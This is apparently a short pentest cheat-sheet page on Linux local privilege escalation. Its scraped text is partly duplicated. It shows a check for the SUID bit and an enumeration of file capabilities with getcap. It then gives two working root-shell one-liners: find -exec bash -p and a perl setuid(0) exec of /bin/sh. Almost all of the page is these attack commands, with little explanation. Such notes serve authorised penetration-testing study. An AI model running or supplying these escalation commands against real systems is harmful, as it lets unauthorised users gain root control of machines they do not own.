Last updated 22 days ago
NOTE: Ensure the utility has SUID setEXAMPLE:Copyjoe@debian-privesc:~$ ls -asl /usr/bin/passwd 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
NOTE: Ensure the utility has SUID set
EXAMPLE:
joe@debian-privesc:~$ ls -asl /usr/bin/passwd 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
/usr/sbin/getcap -r / 2>/dev/null
EXAMPLE:Copyfind /home/joe/Desktop -exec "/usr/bin/bash" -p \;Copyperl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'